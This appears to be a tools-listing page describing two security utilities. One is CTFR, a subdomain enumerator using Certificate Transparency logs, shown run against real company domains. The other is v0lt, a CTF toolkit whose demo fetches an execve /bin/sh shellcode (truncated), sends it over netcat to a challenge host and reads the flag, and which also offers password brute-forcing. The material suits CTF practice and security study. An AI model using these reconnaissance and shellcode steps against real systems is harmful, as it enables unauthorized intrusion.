CTFR - Get subdomains of an HTTPS website abusing Certificate Transparency logs

Do you miss AXFR technique? This tool allows to get the subdomains from a HTTPS website in a few seconds.
How it works? CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
For more information about CT logs, check www.certificate-transparency.org.

Getting Started
Please, follow the instructions below for installing and run CTFR.

Pre-requisites
Make sure you have installed the following tools:

Python 3.0 or later.
pip3 (sudo apt-get install python3-pip).

Installing

git clone https://github.com/UnaPibaGeek/ctfr.git
cd ctfr
pip3 install -r requirements.txt

Running

python3 ctfr.py --help

Usage
Parameters and examples of use.

Parameters

-d --domain [target_domain] (required)
-o --output [output_file] (optional)

Examples

python3 ctfr.py -d starbucks.com

python3 ctfr.py -d facebook.com -o /home/shei/subdomains_fb.txt

Screenshot

Author

• Sheila A. Berta - (@UnaPibaGeek).

Download CTFR

Read More

Security CTF Toy Tools - v0lt

v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

Requirements and Installation

Dependencies:

• Libmagic
• Python3
  • BeautifulSoup
  • Requests
  • filemagic
  • hexdump
  • passlib

Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellHack(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

Implemented:

• Crypto
  
  • Base64
  • Ceasar shift
  • Hashing functions (SHA, MD5)
  • Bits manipulations (XOR, inverse XOR)
  • Usual conversions (bytes, strings, hex)
  • RSA basics (inverse modulo, inverse power, egcd...)
  • Bruteforcing (Dictionnary, custom word)
• Shellcodes
  
  • Shellcode selection and download from Shell-storm repo
  • Shellcode formater
  • Shell{cat,net}: Sending shellcode made easy
  • Automatic padding
• Easy connection support
  
  • Netcat
  • Telnet

And more Examples are available here

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.3

• Lots of fixes again
• Hexeditor (Dump/Rewrite files)
• Unix password bruteforce cracker

1.2

• Lots of documentation/bugs/framework fixes
• Added bruteforce
• Added linux utils
• Began hexeditor
• Shellhack fixes
• Alert messages

1.0

• Lots of documentation fixes
• Lots of bugfixes
• Added shellhack (shellcodes stuff)
• Added crypto utils
• Added network utils
• Fixed project tree

Download V0Lt

Read More